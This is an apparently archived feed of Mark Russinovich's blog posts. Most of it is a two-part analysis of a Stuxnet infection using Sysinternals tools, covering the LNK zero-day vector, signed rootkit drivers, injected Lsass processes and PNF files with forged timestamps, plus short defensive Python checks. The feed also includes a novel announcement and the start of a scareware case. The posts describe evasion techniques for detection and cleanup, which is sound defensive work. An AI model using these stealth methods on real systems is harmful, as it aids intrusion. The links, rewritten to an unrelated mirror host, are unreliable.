</P> <P> The final modifications made by the virus include the creation of four additional files in the C:\Windows\Inf directory: Oem7a.pnf, Mdmeric3.pnf, Mdmcpq3.pnf and Oem6c.pnf. The file creations are visible together after I set a filter that includes only CreateFile operations: </P> <P> <IMG alt="image" border="0" height="69" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0257.image_5F00_thumb_5F00_7D02DBA2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121330i5968062EF979E03A" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="355" /> </P> <P> PNF files are precompiled INF files and INF files are device driver installation information files. The C:\Windows\Inf directory stores a cache of these files and usually has a PNF file for each INF file. Unlike the other PNF files in the directory, Stuxnet’s PNF files have no INF files with matching names, but their names make them blend in with the other files in that directory. As with the operations writing the driver files, the stacks of these operations also have references to CopyFileEx, and disabling the write-exclusion filter shows that their source files are also the temporary files Stuxnet initially created. 
Here you can see Stuxnet copying ~Dfa.tmp to Oem7a.pnf: </P> <P> <IMG alt="image" border="0" height="146" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1830.image_5F00_thumb_5F00_7C96A8AD.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121331i55DBC066D7261F82" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> All of the writes to these files are performed by the Lsass.exe process with the exception of a few writes to Mdmcpq3.pnf by the infected Services.exe process: </P> <P> <IMG alt="image" border="0" height="43" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3007.image_5F00_thumb_5F00_2CBE7E5B.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121332iC41E9C1FB737A874" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> When done with the copies, Stuxnet takes additional steps to make the files blend in by setting their timestamps to match those of other PNF files in the directory, which on the sample system is November 4, 2009. 
The SetBasicInformationFile operation here sets the create time on Oem7a.pnf: </P> <P> <IMG alt="image" border="0" height="80" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1072.image_5F00_thumb_5F00_70CD6D27.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121333i4C6CC6A1EF8A3F4C" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> Once Stuxnet has set the timestamps, it cleans up after itself by marking the temporary files it created for deletion when it closes them (the operations deleting the other temporary files are in other parts of the trace): </P> <P> <IMG alt="image" border="0" height="47" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8371.image_5F00_thumb_5F00_65692868.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121334i18D78761D5F072E2" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> It’s odd that Stuxnet writes temporary files and then makes copies of them, but it doesn’t appear to be a significant aspect of its execution since no Stuxnet research summary even mentions the temporary files. 
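</P> <P> The earlier observation that Stuxnet’s PNF files have no INF files with matching names lends itself to a quick check. The following is a minimal Python sketch, assuming a directory laid out like C:\Windows\Inf; the function name and the demonstration file names are hypothetical, and an unmatched PNF file is only a lead worth investigating, not proof of infection: </P>
<PRE>
from pathlib import Path
import tempfile


def orphaned_pnf_files(inf_dir):
    """Return sorted names of .pnf files that have no same-named .inf file."""
    directory = Path(inf_dir)
    # Collect the base names of all INF files, ignoring case.
    inf_stems = {
        p.stem.lower() for p in directory.iterdir() if p.suffix.lower() == ".inf"
    }
    return sorted(
        p.name
        for p in directory.iterdir()
        if p.suffix.lower() == ".pnf" and p.stem.lower() not in inf_stems
    )


# Demonstration on a throwaway directory with hypothetical file names.
with tempfile.TemporaryDirectory() as tmp:
    for name in ("mdmcpq.inf", "mdmcpq.PNF", "oem7a.PNF"):
        (Path(tmp) / name).touch()
    orphans = orphaned_pnf_files(tmp)
    print(orphans)
</PRE>
<P> On a real system you would pass the path of the Inf directory instead of the temporary one. Because Stuxnet also resets the timestamps on its PNF files, comparing names is a more dependable signal here than sorting the directory by date.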
</P> <P> One operation in the trace that I can’t account for, and for which I’ve seen no explanation in any of the published Stuxnet analyses, is an attempt to delete a registry value named HKLM\System\CurrentControlSet\Services\Network\FailoverConfig: </P> <P> <IMG alt="image" border="0" height="71" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2110.image_5F00_thumb_5F00_6CDAE4F6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121335iC16B0895C84073B2" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> That registry value and even the Network key referenced are not used by Windows or any component I could find. A search of the executables under the C:\Windows directory didn’t yield any hits. Perhaps Stuxnet creates the value under certain circumstances as a marker and this code automatically runs to delete it. </P> <H4> Next Steps </H4> <P> So far, our analysis of the Stuxnet infection with several Sysinternals tools has documented Stuxnet’s system impact at the time of infection and its method of reactivation at subsequent boots, and has provided a complete recipe for disabling and cleaning Stuxnet off a compromised system. In Part 3 I’ll wrap up my look at Stuxnet with the Sysinternals tools by examining how Stuxnet uses each of the four PNF files it created in order to gain some idea as to their purpose. I’ll also analyze a trace of a Windows 7 Stuxnet infection to show the method by which Stuxnet took advantage of a zero-day vulnerability on Windows 7 (which has since been patched) to gain administrative rights when it was first activated with standard user rights. Continued with <A href="#" target="_blank"> Part 3 </A> . 
</P> <P> <EM> Mark Russinovich is a Technical Fellow on the Windows Azure team at Microsoft and is author of <A href="#" target="_blank"> Windows Internals </A> , <A href="#" target="_blank"> The Windows Sysinternals Administrator’s Reference </A> , and the cyberthriller <A href="#" target="_blank"> Zero Day: A Novel </A> . You can contact him at </EM> <A href="https://gorovian.000webhostapp.com/?exam=mailto:markruss@ntdev.microsoft.com" target="_blank"> <EM> markruss@ntdev.microsoft.com </EM> </A> <EM> . </EM> </P> </BODY></HTML> Thu, 27 Jun 2019 07:16:34 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/analyzing-a-stuxnet-infection-with-the-sysinternals-tools-part-2/ba-p/724055 MarkRussinovich 2019-06-27T07:16:34Z Analyzing a Stuxnet Infection with the Sysinternals Tools, Part 1 https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/analyzing-a-stuxnet-infection-with-the-sysinternals-tools-part-1/ba-p/724029 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Mar 26, 2011 </STRONG> <BR /> <P> Though I didn’t realize what I was seeing, <A href="#" target="_blank"> Stuxnet </A> first came to my attention on July 5 last summer when I received an email from a programmer that included a driver file, Mrxnet.sys, that they had identified as a rootkit. A driver that implements rootkit functionality is nothing particularly noteworthy, but what made this one extraordinary is that its version information identified it as a Microsoft driver and it had a valid digital signature issued by <A href="#" target="_blank"> Realtek Semiconductor Corporation </A> , a legitimate PC component manufacturer (while I appreciate the programmer entrusting the rootkit driver to me, the official way to submit malware to Microsoft is via the <A href="#" target="_blank"> Malware Protection Center portal </A> ). 
</P> <P> I forwarded the file to the Microsoft antimalware and security research teams and our internal review into what became the Stuxnet saga began to unfold, quickly making the driver I had received one of the most infamous pieces of malware ever created. Over the course of the next several months, investigations revealed that Stuxnet made use of four “zero day” Windows vulnerabilities to spread and to gain administrator rights once on a computer (all of which were fixed shortly after they were revealed) and was signed with certificates stolen from <A href="#" target="_blank"> Realtek </A> and <A href="#" target="_blank"> JMicron </A> . Most interestingly, <A href="#" target="_blank"> analysts discovered code </A> that reprograms Siemens SCADA (Supervisory Control and Data Acquisition) systems used in some centrifuges, and many suspect Stuxnet was specifically designed to destroy the centrifuges used by Iran’s nuclear program to enrich uranium, a goal the <A href="#" target="_blank"> Iranian government reported the virus at least partially accomplished </A> . </P> <P> As a result, Stuxnet has been universally acknowledged as the most sophisticated piece of malware created. Because of its apparent motives and clues found in the code, some researchers believe that it’s the first known example of malware used for state-sponsored cyber warfare. Ironically, I present several examples of malware targeting infrastructure systems in my recently published cyber-thriller <A href="#" target="_blank"> Zero Day </A> , which when I wrote the book several years ago seemed a bit of a stretch. Stuxnet has proven the examples to be much more likely than I had thought (by the way, if you’ve read Zero Day, please leave a review on <A href="#" target="_blank"> Amazon.com </A> ). 
</P> <H4> <FONT size="4" style="font-weight: bold"> Malware and the Sysinternals Tools </FONT> </H4> <P> My <A href="#" target="_blank"> last several blog posts </A> have documented cases of the <A href="#" target="_blank"> Sysinternals </A> tools being used to help clean malware infections, but malware researchers also commonly use the tools to analyze malware. Professional malware analysis is a rigorous and tedious process that requires disassembling malware to reverse engineer its operation, but systems monitoring tools like Sysinternals <A href="#" target="_blank"> Process Monitor </A> and <A href="#" target="_blank"> Process Explorer </A> can help analysts get an overall view of malware operation. They can also provide insight into malware’s purpose and help to identify points of execution and pieces of code that require deeper inspection. As the previous blog posts hint, those findings can also serve as a guide for creating malware cleaning recipes for inclusion in antimalware products. </P> <P> I therefore thought it would be interesting to show the insights the Sysinternals tools give when applied to the initial infection steps of the Stuxnet virus (note that no centrifuges were harmed in the writing of this blog post). I’ll show a full infection of a Windows XP system and then uncover the way the virus uses one of the zero-day vulnerabilities to elevate itself to administrative rights when run from an unprivileged account on Windows 7. Keep in mind that Stuxnet is an incredibly complex piece of malware. It propagates and communicates using multiple methods and performs different operations depending on the version of operating system infected and the software installed on the infected system. This look at Stuxnet just scratches the surface and is intended to show how, with no special reverse engineering expertise, the Sysinternals tools can reveal the system impact of a malware infection. 
See Symantec’s <A href="#" target="_blank"> W32.Stuxnet Dossier </A> for a great in-depth analysis of Stuxnet’s operation. </P> <H4> <FONT size="4" style="font-weight: bold"> The Stuxnet Infection Vector </FONT> </H4> <P> Stuxnet spread last summer primarily via USB keys, so I’ll start the infection with the virus installed on a key. The virus consists of six files: four malicious shortcut files with names that are based off of “Copy of Shortcut to.lnk” and two files with names that make them look like common temporary files. I’ve used just one of the shortcut files for this analysis, since they all serve the same purpose: </P> <P> <IMG alt="image" border="0" height="179" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2783.image_5F00_thumb_5F00_2BBF20E1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121301iF7ACD4EBFDCA9AE6" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="190" /> </P> <P> In this infection vector, Stuxnet begins executing without user interaction by taking advantage of a zero-day vulnerability in the Windows Explorer Shell (Shell32.dll) shortcut parsing code. All the user has to do is open a directory containing the Stuxnet files in Explorer. To let the infection succeed, I first uninstalled the fix for the Shell flaw, <A href="#" target="_blank"> KB2286198 </A> , that was pushed out by Windows Update in August 2010. When Explorer opens the shortcut file on an unpatched system to find the shortcut’s target file so that it can helpfully show the icon, Stuxnet infects the system and uses rootkit techniques to hide the files, causing them to disappear from view. 
</P> <H4> <FONT size="4" style="font-weight: bold"> Stuxnet on Windows XP </FONT> </H4> <P> Before triggering the infection, I started <A href="#" target="_blank"> Process Monitor </A> , <A href="#" target="_blank"> Process Explorer </A> and <A href="#" target="_blank"> Autoruns </A> . I configured Autoruns to perform a scan with the “Hide Microsoft and Windows Entries” and “Verify Code Signatures” options checked: </P> <P> <IMG alt="image" border="0" height="149" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1307.image_5F00_thumb_5F00_52F6A581.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121302iFFDAAFE9804682F1" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="244" /> </P> <P> This removes any entries that have Microsoft or Windows digital signatures so that Autoruns shows only entries populated by third-party code, including code signed by other publishers. I saved the output of the scan so that I could have Autoruns compare against it later and highlight any entries added by Stuxnet. Similarly, I paused the Process Explorer display by pressing the space bar, which would enable me to refresh it after the infection and cause it to show any processes started by Stuxnet in the green background color Process Explorer uses for new processes. With Process Monitor capturing registry, file system, and DLL activity, I navigated to the USB key’s root directory, watched the temporary files vanish, waited a minute to give the virus time to complete its infection, stopped Process Monitor and refreshed both Autoruns and Process Explorer. </P> <P> After refreshing Autoruns, I used the Compare function in the File menu to compare the updated entries with the previously saved scan. 
Autoruns detected two new device driver registrations, Mrxnet.sys and Mrxcls.sys: </P> <P> <IMG alt="image" border="0" height="121" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8737.image_5F00_thumb_5F00_2092D202.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121303i57F0B4A60816289B" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> Mrxnet.sys is the driver that the programmer originally sent me and that implements the rootkit that hides files, and Mrxcls.sys is a second Stuxnet driver file that launches the malware when the system boots. Stuxnet’s authors could easily have extended Mrxnet’s cloak to hide these files from tools like Autoruns, but they apparently felt confident that the valid digital signatures from a well-known hardware company would cause anyone that noticed them to pass them over. It turns out that Autoruns has told us all we need to know to clean the infection, which is as easy as deleting or disabling the two driver entries. 
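</P> <P> The before-and-after comparison that Autoruns performs amounts to a set difference over autostart entries. The following is a minimal Python sketch of that idea, assuming the two scans are available as CSV text with "Entry Location", "Entry" and "Image Path" columns; the column names and the ExampleDrv row are assumptions for illustration, not output from the actual scans: </P>
<PRE>
import csv
import io

# Hypothetical scan saved before the infection. Column names are an assumption.
BEFORE = """Entry Location,Entry,Image Path
HKLM\\System\\CurrentControlSet\\Services,ExampleDrv,c:\\windows\\system32\\drivers\\exampledrv.sys
"""

# Hypothetical scan taken afterwards: the same entry plus two new driver registrations.
AFTER = BEFORE + """HKLM\\System\\CurrentControlSet\\Services,MRxCls,c:\\windows\\system32\\drivers\\mrxcls.sys
HKLM\\System\\CurrentControlSet\\Services,MRxNet,c:\\windows\\system32\\drivers\\mrxnet.sys
"""


def entries(csv_text):
    """Parse a scan into a set of (location, entry, image path) tuples."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return {
        (row["Entry Location"], row["Entry"], row["Image Path"].lower())
        for row in reader
    }


# Entries present after the infection that were absent before it.
added = sorted(entries(AFTER) - entries(BEFORE))
for location, entry, image in added:
    print(entry, image)
</PRE>
<P> Keying each entry on its location, name and image path means an entry that was merely re-pointed at a different file would also show up as new.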
</P> <P> Turning my attention to Process Explorer, I also saw two green entries, both instances of the Local Security Authority Subsystem (Lsass.exe) process: </P> <P> <IMG alt="image" border="0" height="77" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0211.image_5F00_thumb_5F00_20269F0D.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121304i5495DB9D3E6DAAA8" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> Note the instance of Lsass.exe immediately beneath them that’s highlighted in pink: a normal Windows XP installation has just one instance of Lsass.exe that the Winlogon process creates when the system boots (Wininit creates it on Windows Vista and higher). The process tree reveals that the two new Lsass.exe instances were both created by Services.exe (not visible in the screenshot), the Service Control Manager, which implies that Stuxnet somehow got its code into the Services.exe process. </P> <P> Process Explorer can also check the digital signatures on files, which you initiate by opening the process or DLL properties dialog and clicking on the Verify button, or by selecting the Verify Image Signatures option in the Options menu. 
Checking the rogue Lsass processes confirms that they are running the stock Lsass.exe image: </P> <P> <IMG alt="image" border="0" height="354" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2783.image_5F00_thumb_5F00_0AC8E9A5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121305i5C96A3695F406F09" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="304" /> </P> <P> The two additional Lsass processes obviously have some mischievous purpose, but the main executable and command lines don’t reveal any clues. But besides running as children of Services.exe, another suspicious characteristic of the two superfluous processes is the fact that they have very few DLLs loaded, as shown by the Process Explorer DLL view: </P> <P> <IMG alt="image" border="0" height="178" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8737.image_5F00_thumb_5F00_235886F5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121306iB3C35143C56C14FF" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> The real Lsass has many more: </P> <P> <IMG alt="image" border="0" height="180" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0211.image_5F00_thumb_5F00_7EC6F970.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121307i9A2F20DA67858FCF" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 
0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> No non-Microsoft DLLs show up in the loaded-module lists for Services.exe, Lsass.exe or Explorer.exe, so they are probably hosting injected executable code. Studying the code would require advanced reverse engineering skills, but we might be able to determine where the code resides in those processes, and hence what someone with those skills would analyze, by using the <A href="#" target="_blank"> Sysinternals VMMap </A> utility. VMMap is a process memory analyzer that visually displays the address space usage of a process. To execute, code must be stored in memory regions that have Execute permission, and because injected code will likely be stored in memory that’s normally for data and therefore not usually executable, it might be possible to find the code just by looking for memory that has Execute permission but is not backed by a DLL or executable. If the region also has Write permission, that makes it even more suspicious, because the injection requires Write permission and the injector probably isn’t concerned with removing the permission once the code is in place. 
Sure enough, the legitimate Lsass has no executable data regions, but both new Lsass processes have regions with Execute and Write permissions in their address spaces at the same location and same size: </P> <P> <IMG alt="image" border="0" height="120" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1030.image_5F00_thumb_5F00_2C6674A5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121308i7415EE88EEDB27AF" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="454" /> </P> <P> VMMap’s Strings dialog, which you open from the View menu, shows any printable strings in a selected region. The 488K region has the string “This program cannot be run in DOS mode" at its start, which is a standard message stored in the header of every Windows executable. 
That implies that the virus is not just injecting a code snippet, but an entire DLL: </P> <P> <IMG alt="image" border="0" height="267" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1157.image_5F00_thumb_5F00_0D98BF2B.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121309iEAB8E354360A6EC4" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="329" /> </P> <P> The region is almost devoid of any other recognizable text, so it’s probably compressed, but the Windows API strings at the end of the region are from the DLL’s import table: </P> <P> <IMG alt="image" border="0" height="269" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2211.image_5F00_thumb_5F00_3B19DEEE.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121310i074F1C5BE94FD58D" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="329" /> </P> <P> Explorer.exe, the initially infected process, and Services.exe, the process that launched the Lsass processes, also have no suspicious DLLs loaded, but also have unusual executable data regions: </P> <P> <IMG alt="image" border="0" height="109" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3073.image_5F00_thumb_5F00_2F5A0F6C.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121311iC25C3B2BAFD55FE0" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; 
display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="454" /> </P> <P> The two Mrx drivers are also visible in the loaded driver list, which you can see in the DLL view of Process Explorer for the System process. The only reason they stand out at all is that their version information reports them to be from Microsoft, but their signatures are from Realtek (the certificates have been revoked, but since the test system is disconnected from the Internet, it is unable to query the Certificate Revocation List servers): </P> <P> <IMG alt="image" border="0" height="139" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8750.image_5F00_thumb_5F00_56B44A51.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121312i88D876C18EC50E1A" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> <STRONG> <FONT size="4"> Looking Deeper </FONT> </STRONG> </P> <P> At this point we’ve gotten about as far as we can with Autoruns and Process Explorer. What we know so far is that Stuxnet drops two driver files on the system, registers them to start when the system boots, and starts them. It also infects Services.exe and creates two Lsass.exe processes that run until system shutdown, the purpose of which can’t be determined by their command-lines or loaded DLLs. However, VMMap has given us pointers to injected code and Autoruns has given us an easy way to clean the infection. The Process Monitor trace from the infection has about 30,000 events, and from that we’ll be able to gain further insight into what happens at the time of the infection, where the injected code is stored on disk, and how Stuxnet activates the code at boot time. 
Read more in <A href="#" target="_blank"> Part 2 </A> . </P> <P> <EM> Mark Russinovich is a Technical Fellow on the Windows Azure team at Microsoft and is author of <A href="#" target="_blank"> Windows Internals </A> , <A href="#" target="_blank"> The Windows Sysinternals Administrator’s Reference </A> , and the cyberthriller <A href="#" target="_blank"> Zero Day: A Novel </A> . You can contact him at </EM> <A href="https://gorovian.000webhostapp.com/?exam=mailto:markruss@ntdev.microsoft.com" target="_blank"> <EM> markruss@ntdev.microsoft.com </EM> </A> <EM> . </EM> </P> </BODY></HTML> Thu, 27 Jun 2019 07:13:46 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/analyzing-a-stuxnet-infection-with-the-sysinternals-tools-part-1/ba-p/724029 MarkRussinovich 2019-06-27T07:13:46Z Zero Day is Here! https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/zero-day-is-here/ba-p/724009 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Mar 13, 2011 </STRONG> <BR /> <P> <IMG align="left" alt="image" border="0" height="240" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4784.image_5F00_thumb_5F00_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121300iB86DA387696E0679" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="185" /> I’m excited to announce that my first novel, a cyber thriller entitled <I> Zero Day </I> , is now available at all major book retailers! </P> <P> Zero Day is a book in the style of Crichton and Clancy, weaving technical fact into the story. 
If you like the <A href="#" target="_blank"> Sysinternals tools </A> or the articles I post on this blog, are interested in computer security, or just enjoy a heart-stopping thriller, you’ll like Zero Day.&nbsp; You can read a synopsis and a sample chapter, as well as find pointers to online booksellers, at the <A href="#" target="_blank"> Zero Day </A> web site. </P> <P> I’m really pleased by the initial reviews, which have been very positive. Here is just a sampling: </P> <P> <EM> "Zero Day is an addictive read that will stay with you for a long time to come. It is a MUST READ!" <BR /> </EM> <A href="#" target="_blank"> <EM> http://yougottareadreviews.blogspot.com/2011/01/review-zero-day-by-mark-russinovich.html </EM> </A> </P> <P> <EM> "If you aren't a computer geek, some of the lingo and explanations are going to pass right by you; but there's enough information and ever-developing, terrifying plot developments to keep you riveted to every page." <BR /> </EM> <A href="#" target="_blank"> <EM> http://crystalbookreviews.blogspot.com/2011/01/zero-day-novel-by-mark-russinovich.html </EM> </A> </P> <P> <EM> "The entertaining story line is linear yet exhilarating and frightening especially since author Mark Russinovich is an expert on the topic as his résumé brings a scary possibility to the cyber attack that the thriller focuses on." <BR /> </EM> <A href="#" target="_blank"> <EM> http://genregoroundreviews.blogspot.com/2011/01/zero-day-mark-russinovich.html </EM> </A> </P> <P> <EM> "The novel is more plot than characters, but it is a very frightening, fast moving narrative that reveals how interconnected we all are through the internet." <BR /> </EM> <A href="#" target="_blank"> <EM> http://bookgarden.blogspot.com/2011/01/zero-day-by-mark-russinovich.html </EM> </A> </P> <P> You can read all the reviews I’ve collected so far on the <A href="#" target="_blank"> Praise for Zero Day </A> page at the Zero Day Web site. 
</P> <P> If you’re curious about the novel publishing process, you can read my three-part blog post describing my experience with Zero Day, from the initial idea, to finding an agent, signing a publisher, and final publication: <A href="#" target="_blank"> The Road to Zero Day </A> </P> <P> Buy the book, leave a review on <A href="#" target="_blank"> Amazon.com </A> , follow me on <A href="#" target="_blank"> Twitter </A> , meet me at a <A href="#" target="_blank"> book signing </A> , and send a note sharing your thoughts to <A href="https://gorovian.000webhostapp.com/?exam=mailto:markrussinovich@hotmail.com" target="_blank"> markrussinovich@hotmail.com </A> . </P> <P> I hope you enjoy the book and look forward to hearing from you! </P> </BODY></HTML> Thu, 27 Jun 2019 07:12:15 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/zero-day-is-here/ba-p/724009 MarkRussinovich 2019-06-27T07:12:15Z The Case of the Unusable System https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-unusable-system/ba-p/724007 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Mar 13, 2011 </STRONG> <BR /> <P> This post continues in the malware hunting theme of the <A href="#" target="_blank"> last couple of posts </A> as <A href="#" target="_blank"> Zero Day </A> availability draws near (it’s available tomorrow!). It began when a friend of mine at Microsoft told me that a neighbor of hers had a laptop that malware had rendered unusable and asked if as a favor I’d be willing to take a look. Her friend was desperate because she had important files, including documents and pictures, on the laptop and had no backup. </P> <P> Unlike most people in the computer industry who view the requests of friends and family for troubleshooting help as a burden to be avoided, I embrace the challenge. When fixing a system or application problem, it’s me against the computer and success is satisfying and always a learning experience. 
But that success also has an academic feel. With malware, it becomes personal, pitting me against the minds of criminal hackers. Defeating malware is a victory of good over evil. I should print a t-shirt that says “Yes, I will fix your computer!”. I immediately agreed and we made arrangements to get the laptop dropped off at my office. </P> <P> When I had a few free minutes the next day I powered on the laptop, logged in, and within seconds was greeted with a torrent of warning dialogs announcing that the computer was infested with malware and that it was under attack from the Internet: </P> <P> <IMG alt="image" border="0" height="360" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/5165.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121296i7641C68519D6CC75" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="550" /> </P> <P> I also saw a barrage of warnings that various applications had been stopped from launching because they were infected: </P> <P> <IMG alt="image" border="0" height="131" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4101.image_5F00_thumb_5F00_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121297iD9016A927EC2AEC3" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="385" /> </P> <P> I hadn’t seen scareware this aggressive. After a minute the appearance of new warnings ceased and I began my investigation. Starting with the insertion of a USB key containing the Sysinternals tools, I tried launching <A href="#" target="_blank"> Process Explorer </A> . 
